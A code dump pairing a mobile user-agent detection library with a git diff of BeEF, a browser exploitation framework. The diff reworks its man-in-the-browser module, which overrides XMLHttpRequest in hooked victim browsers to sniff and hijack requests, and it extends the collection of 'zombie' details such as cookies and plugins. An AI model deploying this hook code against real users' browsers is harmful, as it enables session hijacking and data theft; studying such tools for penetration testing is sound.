var mobile = "mobile"; //Some mobile browsers put 'mobile' in their user agent strings.
var mobi = "mobi"; //Some mobile browsers put 'mobi' in their user agent strings.
var maemo = "maemo";
var linux = "linux";
var qtembedded = "qt embedded"; //for Sony Mylo and others
var mylocom2 = "com2"; //for Sony Mylo also
var manuSonyEricsson = "sonyericsson";
var manuericsson = "ericsson";
var manuSamsung1 = "sec-sgh";
var manuSony = "sony";
var manuHtc = "htc"; //Popular Android and WinMo manufacturer
var svcDocomo = "docomo";
var svcKddi = "kddi";
var svcVodafone = "vodafone";
var disUpdate = "update"; //pda vs. update
var uagent = "";
if (navigator && navigator.userAgent)
uagent = navigator.userAgent.toLowerCase();
function DetectIphone()
{
if (uagent.search(deviceIphone) > -1)
{
if (DetectIpad() || DetectIpod())
return false;
else
return true;
}
else
return false;
}
function DetectIpod()
{
if (uagent.search(deviceIpod) > -1)
return true;
else
return false;
}
function DetectIpad()
{
if (uagent.search(deviceIpad) > -1 && DetectWebkit())
return true;
else
return false;
}
function DetectIphoneOrIpod()
{
if (uagent.search(deviceIphone) > -1 ||
uagent.search(deviceIpod) > -1)
return true;
else
return false;
}
function DetectIos()
{
if (DetectIphoneOrIpod() || DetectIpad())
return true;
else
return false;
}
function DetectAndroid()
{
if ((uagent.search(deviceAndroid) > -1) || DetectGoogleTV())
return true;
if (uagent.search(deviceHtcFlyer) > -1)
return true;
else
return false;
}
function DetectAndroidPhone()
{
if (DetectAndroid() && (uagent.search(mobile) > -1))
return true;
if (DetectOperaAndroidPhone())
return true;
if (uagent.search(deviceHtcFlyer) > -1)
return true;
else
return false;
}
function DetectAndroidTablet()
{
if (!DetectAndroid())
return false;
if (DetectOperaMobile())
return false;
if (uagent.search(deviceHtcFlyer) > -1)
return false;
if (uagent.search(mobile) > -1)
return false;
else
return true;
}
function DetectAndroidWebKit()
{
if (DetectAndroid() && DetectWebkit())
return true;
else
return false;
}
function DetectGoogleTV()
{
if (uagent.search(deviceGoogleTV) > -1)
return true;
else
return false;
}
function DetectWebkit()
{
if (uagent.search(engineWebKit) > -1)
return true;
else
return false;
}
function DetectS60OssBrowser()
{
if (DetectWebkit())
{
if ((uagent.search(deviceS60) > -1 ||
uagent.search(deviceSymbian) > -1))
return true;
else
return false;
}
else
return false;
}
function DetectSymbianOS()
{
if (uagent.search(deviceSymbian) > -1 ||
uagent.search(deviceS60) > -1 ||
uagent.search(deviceS70) > -1 ||
uagent.search(deviceS80) > -1 ||
uagent.search(deviceS90) > -1)
return true;
else
return false;
}
function DetectWindowsPhone7()
{
if (uagent.search(deviceWinPhone7) > -1)
return true;
else
return false;
}
function DetectWindowsMobile()
{
if (DetectWindowsPhone7())
return false;
if (uagent.search(deviceWinMob) > -1 ||
uagent.search(deviceIeMob) > -1 ||
uagent.search(enginePie) > -1)
return true;
if ((uagent.search(devicePpc) > -1) &&
!(uagent.search(deviceMacPpc) > -1))
return true;
if (uagent.search(manuHtc) > -1 &&
uagent.search(deviceWindows) > -1)
return true;
else
return false;
}
function DetectBlackBerry()
{
if (uagent.search(deviceBB) > -1)
return true;
if (uagent.search(vndRIM) > -1)
return true;
else
return false;
}
function DetectBlackBerryTablet()
{
if (uagent.search(deviceBBPlaybook) > -1)
return true;
else
return false;
}
function DetectBlackBerryWebKit()
{
if (DetectBlackBerry() &&
uagent.search(engineWebKit) > -1)
return true;
else
return false;
}
function DetectBlackBerryTouch()
{
if (DetectBlackBerry() &&
((uagent.search(deviceBBStorm) > -1) ||
(uagent.search(deviceBBTorch) > -1) ||
(uagent.search(deviceBBBoldTouch) > -1) ||
(uagent.search(deviceBBCurveTouch) > -1) ))
return true;
else
return false;
}
function DetectBlackBerryHigh()
{
if (DetectBlackBerryWebKit())
return false;
if (DetectBlackBerry())
{
if (DetectBlackBerryTouch() ||
uagent.search(deviceBBBold) > -1 ||
uagent.search(deviceBBTour) > -1 ||
uagent.search(deviceBBCurve) > -1)
return true;
else
return false;
}
else
return false;
}
function DetectBlackBerryLow()
{
if (DetectBlackBerry())
{
if (DetectBlackBerryHigh() || DetectBlackBerryWebKit())
return false;
else
return true;
}
else
return false;
}
function DetectPalmOS()
{
if (uagent.search(devicePalm) > -1 ||
uagent.search(engineBlazer) > -1 ||
uagent.search(engineXiino) > -1)
{
if (DetectPalmWebOS())
return false;
else
return true;
}
else
return false;
}
function DetectPalmWebOS()
{
if (uagent.search(deviceWebOS) > -1)
return true;
else
return false;
}
function DetectWebOSTablet()
{
if (uagent.search(deviceWebOShp) > -1 &&
uagent.search(deviceTablet) > -1)
return true;
else
return false;
}
function DetectGarminNuvifone()
{
if (uagent.search(deviceNuvifone) > -1)
return true;
else
return false;
}
function DetectSmartphone()
{
if (DetectIphoneOrIpod()
|| DetectAndroidPhone()
|| DetectS60OssBrowser()
|| DetectSymbianOS()
|| DetectWindowsMobile()
|| DetectWindowsPhone7()
|| DetectBlackBerry()
|| DetectPalmWebOS()
|| DetectPalmOS()
|| DetectGarminNuvifone())
return true;
return false;
};
function DetectArchos()
{
if (uagent.search(deviceArchos) > -1)
return true;
else
return false;
}
function DetectBrewDevice()
{
if (uagent.search(deviceBrew) > -1)
return true;
else
return false;
}
function DetectDangerHiptop()
{
if (uagent.search(deviceDanger) > -1 ||
uagent.search(deviceHiptop) > -1)
return true;
else
return false;
}
function DetectMaemoTablet()
{
if (uagent.search(maemo) > -1)
return true;
if ((uagent.search(linux) > -1)
&& (uagent.search(deviceTablet) > -1)
&& !DetectWebOSTablet()
&& !DetectAndroid())
return true;
else
return false;
}
function DetectSonyMylo()
{
if (uagent.search(manuSony) > -1)
{
if (uagent.search(qtembedded) > -1 ||
uagent.search(mylocom2) > -1)
return true;
else
return false;
}
else
return false;
}
function DetectOperaMobile()
{
if (uagent.search(engineOpera) > -1)
{
if (uagent.search(mini) > -1 ||
uagent.search(mobi) > -1)
return true;
else
return false;
}
else
return false;
}
function DetectOperaAndroidPhone()
{
if ((uagent.search(engineOpera) > -1) &&
(uagent.search(deviceAndroid) > -1) &&
(uagent.search(mobi) > -1))
return true;
else
return false;
}
function DetectOperaAndroidTablet()
{
if ((uagent.search(engineOpera) > -1) &&
(uagent.search(deviceAndroid) > -1) &&
(uagent.search(deviceTablet) > -1))
return true;
else
return false;
}
function DetectSonyPlaystation()
{
if (uagent.search(devicePlaystation) > -1)
return true;
else
return false;
};
function DetectNintendo()
{
if (uagent.search(deviceNintendo) > -1 ||
uagent.search(deviceWii) > -1 ||
uagent.search(deviceNintendoDs) > -1)
return true;
else
return false;
};
function DetectXbox()
{
if (uagent.search(deviceXbox) > -1)
return true;
else
return false;
};
function DetectGameConsole()
{
if (DetectSonyPlaystation())
return true;
if (DetectNintendo())
return true;
if (DetectXbox())
return true;
else
return false;
};
function DetectKindle()
{
if (uagent.search(deviceKindle) > -1 &&
!DetectAndroid())
return true;
else
return false;
}
function DetectAmazonSilk()
{
if (uagent.search(engineSilk) > -1)
return true;
else
return false;
}
function DetectMobileQuick()
{
if (DetectTierTablet())
return false;
if (DetectSmartphone())
return true;
if (uagent.search(deviceMidp) > -1 ||
DetectBrewDevice())
return true;
if (DetectOperaMobile())
return true;
if (uagent.search(engineNetfront) > -1)
return true;
if (uagent.search(engineUpBrowser) > -1)
return true;
if (uagent.search(engineOpenWeb) > -1)
return true;
if (DetectDangerHiptop())
return true;
if (DetectMaemoTablet())
return true;
if (DetectArchos())
return true;
if ((uagent.search(devicePda) > -1) &&
!(uagent.search(disUpdate) > -1))
return true;
if (uagent.search(mobile) > -1)
return true;
if (DetectKindle() ||
DetectAmazonSilk())
return true;
return false;
};
function DetectMobileLong()
{
if (DetectMobileQuick())
return true;
if (DetectGameConsole())
return true;
if (DetectSonyMylo())
return true;
if (uagent.search(manuSamsung1) > -1 ||
uagent.search(manuSonyEricsson) > -1 ||
uagent.search(manuericsson) > -1)
return true;
if (uagent.search(svcDocomo) > -1)
return true;
if (uagent.search(svcKddi) > -1)
return true;
if (uagent.search(svcVodafone) > -1)
return true;
return false;
};
function DetectTierTablet()
{
if (DetectIpad()
|| DetectAndroidTablet()
|| DetectBlackBerryTablet()
|| DetectWebOSTablet())
return true;
else
return false;
};
function DetectTierIphone()
{
if (DetectIphoneOrIpod())
return true;
if (DetectAndroidPhone())
return true;
if (DetectBlackBerryWebKit() && DetectBlackBerryTouch())
return true;
if (DetectWindowsPhone7())
return true;
if (DetectPalmWebOS())
return true;
if (DetectGarminNuvifone())
return true;
else
return false;
};
function DetectTierRichCss()
{
if (DetectMobileQuick())
{
if (DetectTierIphone() || DetectKindle())
return false;
if (DetectWebkit())
return true;
if (DetectS60OssBrowser())
return true;
if (DetectBlackBerryHigh())
return true;
if (DetectWindowsMobile())
return true;
if (uagent.search(engineTelecaQ) > -1)
return true;
else
return false;
}
else
return false;
};
function DetectTierOtherPhones()
{
if (DetectMobileLong())
{
if (DetectTierIphone() || DetectTierRichCss())
return false;
else
return true;
}
else
return false;
};
function InitDeviceScan()
{
isIphone = DetectIphoneOrIpod();
isAndroidPhone = DetectAndroidPhone();
isTierIphone = DetectTierIphone();
isTierTablet = DetectTierTablet();
isTierRichCss = DetectTierRichCss();
isTierGenericMobile = DetectTierOtherPhones();
};
InitDeviceScan()

75
core/main/client/mitb.js
View File

@@ -14,47 +14,30 @@ beef.mitb = {
beef.mitb.cid = cid;
beef.mitb.curl = curl;
/*Override open method to intercept ajax request*/
var xml_type;
var hook_file = "<%= @hook_file %>";
if (window.XMLHttpRequest && !(window.ActiveXObject)) {
xml_type = 'XMLHttpRequest';
}
if (xml_type == "XMLHttpRequest") {
beef.mitb.sniff("Method XMLHttpRequest.open override");
(function (open) {
XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
var portRegex = new RegExp(":[0-9]+");
var portR = portRegex.exec(url);
/*return :port*/
var requestPort;
if (portR != null) {
requestPort = portR[0].split(":");
}
if ((user == "beef") && (pass == "beef")) {
/*a poisoned something*/
open.call(this, method, url, async, null, null);
}
else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
/*a beef hook.js polling or dh */
open.call(this, method, url, async, null, null);
}
else {
XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
// Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
// or a request initiated by the MiTB itself.
if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
open.call(this, method, url, async, true);
}else {
var portRegex = new RegExp(":[0-9]+");
var portR = portRegex.exec(url);
var requestPort;
if (portR != null) { requestPort = portR[0].split(":")[1]; }
//GET request
if (method == "GET") {
//GET request -> cross-domain
if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
window.open(url);
}
else {
}else { //GET request -> same-domain
beef.mitb.sniff("GET [Ajax Request]: " + url);
if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
var title = "";
@@ -63,26 +46,19 @@ beef.mitb = {
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
/*write the url of the page*/
// write the url of the page
history.pushState({ Be:"EF" }, title, url);
}
}
}
else {
/*if we are here we have an ajax post req*/
beef.mitb.sniff("Post ajax request to: " + url);
open.call(this, method, url, async, user, pass);
}else{
//POST request
beef.mitb.sniff("POST ajax request to: " + url);
open.call(this, method, url, async, true);
}
}
};
})(XMLHttpRequest.prototype.open);
}
},
// Initializes the hook on anchors and forms.
@@ -161,7 +137,7 @@ beef.mitb = {
fetchForm:function (url, query, target) {
try {
var y = new XMLHttpRequest();
y.open('POST', url, false, "beef", "beef");
y.open('POST', url, false, true);
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
@@ -181,14 +157,13 @@ beef.mitb = {
fetch:function (url, target) {
try {
var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef");
y.open('GET', url, false, true);
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
};
y.send(null);
beef.mitb.sniff("GET: " + url);
return true;
@@ -204,7 +179,7 @@ beef.mitb = {
try {
var target = document.getElementsByTagName("html")[0];
var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef");
y.open('GET', url, false, true);
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
var title = "";
@@ -223,11 +198,9 @@ beef.mitb = {
beef.mitb.sniff("GET: " + url);
} catch (x) {
// the link is cross-domain, so load the resource in a different tab
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
}
},

44
core/main/client/os.js
View File

@@ -7,9 +7,9 @@
beef.os = {
ua: navigator.userAgent,
isWin311: function() {
return (this.ua.indexOf("Win16") != -1) ? true : false;
return (this.ua.match('(Win16)')) ? true : false;
},
isWinNT4: function() {
@@ -19,18 +19,25 @@ beef.os = {
isWin95: function() {
return (this.ua.match('(Windows 95)|(Win95)|(Windows_95)')) ? true : false;
},
isWinCE: function() {
return (this.ua.match('(Windows CE)')) ? true : false;
},
isWin98: function() {
return (this.ua.match('(Windows 98)|(Win98)')) ? true : false;
},
isWinME: function() {
return (this.ua.indexOf('Windows ME') != -1) ? true : false;
return (this.ua.match('(Windows ME)|(Win 9x 4.90)')) ? true : false;
},
isWin2000: function() {
return (this.ua.match('(Windows NT 5.0)|(Windows 2000)')) ? true : false;
},
isWin2000SP1: function() {
return (this.ua.match('Windows NT 5.01 ')) ? true : false;
},
isWinXP: function() {
return (this.ua.match('(Windows NT 5.1)|(Windows XP)')) ? true : false;
@@ -47,6 +54,10 @@ beef.os = {
isWin7: function() {
return (this.ua.match('(Windows NT 6.1)|(Windows NT 7.0)')) ? true : false;
},
isWin8: function() {
return (this.ua.match('(Windows NT 6.2)')) ? true : false;
},
isOpenBSD: function() {
return (this.ua.indexOf('OpenBSD') != -1) ? true : false;
@@ -103,19 +114,26 @@ beef.os = {
isBeOS: function() {
return (this.ua.match('BeOS')) ? true : false;
},
isWindows: function() {
return this.isWin311() || this.isWinNT4() || this.isWinCE() || this.isWin95() || this.isWin98() || this.isWinME() || this.isWin2000() || this.isWin2000SP1() || this.isWinXP() || this.isWinServer2003() || this.isWinVista() || this.isWin7() || this.isWin8() || this.isWinPhone();
},
getName: function() {
//windows
if(this.isWin311()) return 'Windows 3.11';
if(this.isWinNT4()) return 'Windows NT 4';
if(this.isWin95()) return 'Windows 95';
if(this.isWin98()) return 'Windows 98';
if(this.isWinME()) return 'Windows Millenium';
if(this.isWin2000()) return 'Windows 2000';
if(this.isWinXP()) return 'Windows XP';
//Windows
if(this.isWin311()) return 'Windows 3.11';
if(this.isWinNT4()) return 'Windows NT 4';
if(this.isWinCE()) return 'Windows CE';
if(this.isWin95()) return 'Windows 95';
if(this.isWin98()) return 'Windows 98';
if(this.isWinME()) return 'Windows Millenium';
if(this.isWin2000()) return 'Windows 2000';
if(this.isWin2000SP1()) return 'Windows 2000 SP1';
if(this.isWinXP()) return 'Windows XP';
if(this.isWinServer2003()) return 'Windows Server 2003';
if(this.isWinVista()) return 'Windows Vista';
if(this.isWin7()) return 'Windows 7';
if(this.isWinVista()) return 'Windows Vista';
if(this.isWin7()) return 'Windows 7';
if(this.isWin8()) return 'Windows 8';
//Nokia
if(this.isNokia()) {

2
core/main/constants/hardware.rb
View File

@@ -12,6 +12,8 @@ module Constants
module Hardware
HW_UNKNOWN_IMG = 'pc.png'
HW_VM_IMG = 'vm.png'
HW_LAPTOP_IMG = 'laptop.png'
HW_IPHONE_UA_STR = 'iPhone'
HW_IPHONE_IMG = 'iphone.jpg'
HW_IPAD_UA_STR = 'iPad'

54
core/main/handlers/browserdetails.rb
View File

@@ -168,11 +168,11 @@ module BeEF
end
# get and store the system platform
system_platform = get_param(@data['results'], 'SystemPlatform')
system_platform = get_param(@data['results'], 'BrowserPlatform')
if BeEF::Filters.is_valid_system_platform?(system_platform)
BD.set(session_id, 'SystemPlatform', system_platform)
BD.set(session_id, 'BrowserPlatform', system_platform)
else
self.err_msg "Invalid system platform returned from the hook browser's initial connection."
self.err_msg "Invalid browser platform returned from the hook browser's initial connection."
end
# get and store the hooked browser type
@@ -255,6 +255,54 @@ module BeEF
self.err_msg "Invalid value for HasActiveX returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasSilverlight
has_silverlight = get_param(@data['results'], 'HasSilverlight')
if BeEF::Filters.is_valid_yes_no?(has_silverlight)
BD.set(session_id, 'HasSilverlight', has_silverlight)
else
self.err_msg "Invalid value for HasSilverlight returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasQuickTime
has_quicktime = get_param(@data['results'], 'HasQuickTime')
if BeEF::Filters.is_valid_yes_no?(has_quicktime)
BD.set(session_id, 'HasQuickTime', has_quicktime)
else
self.err_msg "Invalid value for HasQuickTime returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasRealPlayer
has_realplayer = get_param(@data['results'], 'HasRealPlayer')
if BeEF::Filters.is_valid_yes_no?(has_realplayer)
BD.set(session_id, 'HasRealPlayer', has_realplayer)
else
self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasVLC
has_vlc = get_param(@data['results'], 'HasVLC')
if BeEF::Filters.is_valid_yes_no?(has_vlc)
BD.set(session_id, 'HasVLC', has_vlc)
else
self.err_msg "Invalid value for HasVLC returned from the hook browser's initial connection."
end
# get and store the value for CPU
cpu_type = get_param(@data['results'], 'CPU')
if !cpu_type.nil?
BD.set(session_id, 'CPU', cpu_type)
else
self.err_msg "Invalid value for CPU returned from the hook browser's initial connection."
end
# get and store the value for TouchEnabled
touch_enabled = get_param(@data['results'], 'TouchEnabled')
if BeEF::Filters.is_valid_yes_no?(touch_enabled)
BD.set(session_id, 'TouchEnabled', touch_enabled)
else
self.err_msg "Invalid value for TouchEnabled returned from the hook browser's initial connection."
end
# get and store whether the browser has session cookies enabled
has_session_cookies = get_param(@data['results'], 'hasSessionCookies')
if BeEF::Filters.is_valid_yes_no?(has_session_cookies)

7
core/main/handlers/modules/beefjs.rb
View File

@@ -21,7 +21,7 @@ module BeEF
beef_js_path = "#{$root_dir}/core/main/client/"
# @note External libraries (like jQuery) that are not evaluated with Eruby and possibly not obfuscated
ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js)
ext_js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js lib/jools.min.js lib/mdetect.js)
# @note BeEF libraries: need Eruby evaluation and obfuscation
beef_js_sub_files = %w(beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js net/cors.js are.js)
@@ -74,6 +74,9 @@ module BeEF
# @note set the XHR-polling timeout
hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
# @note set the hook file path
hook_session_config['hook_file'] = config.get("beef.http.hook_file")
# @note if http_port <> public_port in config ini, use the public_port
unless hook_session_config['beef_public_port'].nil?
if hook_session_config['beef_port'] != hook_session_config['beef_public_port']
@@ -99,7 +102,7 @@ module BeEF
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
else
@final_hook = ext_js_to_not_obfuscate + @hook
end

4
core/main/models/browserdetails.rb
View File

@@ -103,7 +103,9 @@ module Models
def self.hw_icon(session_id)
ua_string = get(session_id, 'BrowserReportedName')
hardware = get(session_id, 'Hardware')
return BeEF::Core::Constants::Hardware::HW_VM_IMG if hardware =~ /Virtual Machine/
return BeEF::Core::Constants::Hardware::HW_LAPTOP_IMG if hardware =~ /Laptop/
return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil?
return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR

32
core/main/network_stack/assethandler.rb
View File

@@ -24,6 +24,38 @@ module Handlers
@root_dir = File.expand_path('../../../../', __FILE__)
end
# Binds a redirector to a mount point
# @param [String] target The target for the redirector
# @param [String] path An optional URL path to mount the redirector to (can be nil for a random path)
# @return [String] URL Path of the redirector
# @todo This function, similar to bind(), should accept a hooked browser session to limit the mounted file to a certain session etc.
def bind_redirect(target, path=nil)
url = build_url(path,nil)
@allocations[url] = {'target' => target}
@http_server.mount(url,BeEF::Core::NetworkStack::Handlers::Redirector.new(target))
@http_server.remap
print_info "Redirector to [" + target + "] bound to url [" + url + "]"
url
end
# Binds raw HTTP to a mount point
# @param [Integer] status HTTP status code to return
# @param [String] headers HTTP headers as a JSON string to return
# @param [String] body HTTP body to return
# @param [String] path URL path to mount the asset to TODO (can be nil for random path)
# @todo @param [Integer] count The amount of times the asset can be accessed before being automatically unbinded (-1 = unlimited)
def bind_raw(status, header, body, path=nil, count=-1)
url = build_url(path,nil)
@allocations[url] = {}
@http_server.mount(
url,
BeEF::Core::NetworkStack::Handlers::Raw.new(status, header, body)
)
@http_server.remap
print_info "Raw HTTP bound to url [" + url + "]"
url
end
# Binds a file to a mount point
# @param [String] file File path to asset
# @param [String] path URL path to mount the asset to (can be nil for random path)

33
core/main/network_stack/handlers/raw.rb Normal file
View File

@@ -0,0 +1,33 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module NetworkStack
module Handlers
class Raw
def initialize(status, header={}, body)
@status = status
@header = header
@body = body
end
def call(env)
[@status, @header, @body]
end
private
@request
@response
end
end
end
end
end

42
core/main/network_stack/handlers/redirector.rb Normal file
View File

@@ -0,0 +1,42 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module NetworkStack
module Handlers
# @note Redirector is used as a Rack app for mounting HTTP redirectors, instead of content
# @todo Add new options to specify what kind of redirect you want to achieve
class Redirector
@target = ""
def initialize(target)
@target = target
end
def call(env)
@response = Rack::Response.new(
body = ['302 found'],
status = 302,
header = {
'Content-Type' => 'text',
'Location' => @target
}
)
end
private
@request
@response
end
end
end
end
end

20
core/main/rest/handlers/hookedbrowsers.rb
View File

@@ -72,15 +72,15 @@ module BeEF
details = BeEF::Core::Models::BrowserDetails
{
'id' => hb.id,
'session' => hb.session,
'name' => details.get(hb.session, 'BrowserName'),
'version' => details.get(hb.session, 'BrowserVersion'),
'os' => details.get(hb.session, 'OsName'),
'platform' => details.get(hb.session, 'SystemPlatform'),
'ip' => hb.ip,
'domain' => details.get(hb.session, 'HostName'),
'port' => hb.port.to_s,
'id' => hb.id,
'session' => hb.session,
'name' => details.get(hb.session, 'BrowserName'),
'version' => details.get(hb.session, 'BrowserVersion'),
'os' => details.get(hb.session, 'OsName'),
'platform' => details.get(hb.session, 'BrowserPlatform'),
'ip' => hb.ip,
'domain' => details.get(hb.session, 'HostName'),
'port' => hb.port.to_s,
'page_uri' => details.get(hb.session, 'PageURI')
}
end
@@ -88,4 +88,4 @@ module BeEF
end
end
end
end
end

4
core/main/server.rb
View File

@@ -4,6 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
# Remove Thin 'Server' response header
Thin.send :remove_const, :SERVER
Thin::SERVER = nil
module BeEF
module Core

3
core/ruby.rb
View File

@@ -7,6 +7,9 @@
# @note Patching Ruby Security
require 'core/ruby/security'
# @note Patching Rack File class to prevent a potential XSS
require 'core/ruby/file.rb'
# @note Patching Ruby
require 'core/ruby/module'
require 'core/ruby/object'

44
core/ruby/file.rb Normal file
View File

@@ -0,0 +1,44 @@
require 'time'
require 'rack/utils'
require 'rack/mime'
module Rack
class File
def _call(env)
unless ALLOWED_VERBS.include? env["REQUEST_METHOD"]
return fail(405, "Method Not Allowed")
end
@path_info = Utils.unescape(env["PATH_INFO"])
parts = @path_info.split SEPS
parts.inject(0) do |depth, part|
case part
when '', '.'
depth
when '..'
return fail(404, "Not Found") if depth - 1 < 0
depth - 1
else
depth + 1
end
end
@path = F.join(@root, *parts)
available = begin
F.file?(@path) && F.readable?(@path)
rescue SystemCallError
false
end
if available
serving(env)
else
# this is the patched line. No need to reflect the URI path, potential XSS
# exploitable if you can bypass the Content-type: text/plain (IE MHTML and tricks like that)
fail(404, "File not found")
end
end
end
end

559
extensions/admin_ui/controllers/modules/modules.rb
View File

@@ -7,14 +7,14 @@ module BeEF
module Extension
module AdminUI
module Controllers
#
#
#
class Modules < BeEF::Extension::AdminUI::HttpController
BD = BeEF::Core::Models::BrowserDetails
def initialize
super({
'paths' => {
@@ -31,7 +31,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
'/commandmodule/reexecute' => method(:reexecute_command_module)
}
})
@session = BeEF::Extension::AdminUI::Session.instance
end
@@ -45,11 +45,11 @@ class Modules < BeEF::Extension::AdminUI::HttpController
'token' => BeEF::Core::Configuration.instance.get("beef.api_token")
}.to_json
end
# Returns a JSON array containing the summary for a selected zombie.
def select_zombie_summary
# get the zombie
# get the zombie
zombie_session = @params['zombie_session'] || nil
(print_error "Zombie session is nil";return) if zombie_session.nil?
zombie = BeEF::Core::Models::HookedBrowser.first(:session => zombie_session)
@@ -57,390 +57,91 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# init the summary grid
summary_grid_hash = {
'success' => 'true',
'success' => 'true',
'results' => []
}
# set and add the return values for the page title
page_title = BD.get(zombie_session, 'PageTitle')
if not page_title.nil?
encoded_page_title = CGI.escapeHTML(page_title)
encoded_page_title_hash = { 'Page Title' => encoded_page_title }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_page_title_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
# zombie properties
# in the form of: category, UI label, value
zombie_properties = [
# Browser
['Browser', 'Browser Name', 'BrowserName'],
['Browser', 'Browser Version', 'BrowserVersion'],
['Browser', 'Browser UA String', 'BrowserReportedName'],
['Browser', 'Browser Platform', 'BrowserPlatform'],
['Browser', 'Browser Plugins', 'BrowserPlugins'],
['Browser', 'Window Size', 'WindowSize'],
# Browser Components
['Browser Components', 'Flash', 'HasFlash'],
['Browser Components', 'Java', 'JavaEnabled'],
['Browser Components', 'VBScript', 'VBScriptEnabled'],
['Browser Components', 'PhoneGap', 'HasPhonegap'],
['Browser Components', 'Google Gears', 'HasGoogleGears'],
['Browser Components', 'Silverlight', 'HasSilverlight'],
['Browser Components', 'Web Sockets', 'HasWebSocket'],
['Browser Components', 'QuickTime', 'HasQuickTime'],
['Browser Components', 'RealPlayer', 'HasRealPlayer'],
['Browser Components', 'VLC', 'HasVLC'],
['Browser Components', 'ActiveX', 'HasActiveX'],
['Browser Components', 'Session Cookies', 'hasSessionCookies'],
['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
# Hooked Page
['Hooked Page', 'Page Title', 'PageTitle'],
['Hooked Page', 'Page URI', 'PageURI'],
['Hooked Page', 'Page Referrer', 'PageReferrer'],
['Hooked Page', 'Host Name/IP', 'HostName'],
['Hooked Page', 'Cookies', 'Cookies'],
# Host
['Host', 'Date', 'DateStamp'],
['Host', 'Operating System', 'OsName'],
['Host', 'Hardware', 'Hardware'],
['Host', 'CPU', 'CPU'],
['Host', 'Screen Size', 'ScreenSize'],
['Host', 'Touch Screen', 'TouchEnabled']
]
# set and add the return values for each browser property
# in the form of: category, UI label, value
zombie_properties.each do |p|
case p[2]
when "BrowserName"
data = BeEF::Core::Constants::Browsers.friendly_name(BD.get(zombie_session, p[2]))
when "ScreenSize"
screen_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_size_hash['width']
height = screen_size_hash['height']
cdepth = screen_size_hash['colordepth']
data = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
when "WindowSize"
window_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = window_size_hash['width']
height = window_size_hash['height']
data = "Width: #{width}, Height: #{height}"
else
data = BD.get(zombie_session, p[2])
end
# add property to summary hash
if not data.nil?
summary_grid_hash['results'].push({
'category' => p[0],
'data' => { p[1] => CGI.escapeHTML("#{data}") },
'from' => 'Initialization'
})
end
end
# set and add the return values for the page uri
page_uri = BD.get(zombie_session, 'PageURI')
if not page_uri.nil?
encoded_page_uri = CGI.escapeHTML(page_uri)
encoded_page_uri_hash = { 'Page URI' => encoded_page_uri }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_page_uri_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the page referrer
page_referrer = BD.get(zombie_session, 'PageReferrer')
if not page_referrer.nil?
encoded_page_referrer = CGI.escapeHTML(page_referrer)
encoded_page_referrer_hash = { 'Page Referrer' => encoded_page_referrer }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_page_referrer_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the host name
host_name = BD.get(zombie_session, 'HostName')
if not host_name.nil?
encoded_host_name = CGI.escapeHTML(host_name)
encoded_host_name_hash = { 'Hostname/IP' => encoded_host_name }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_host_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
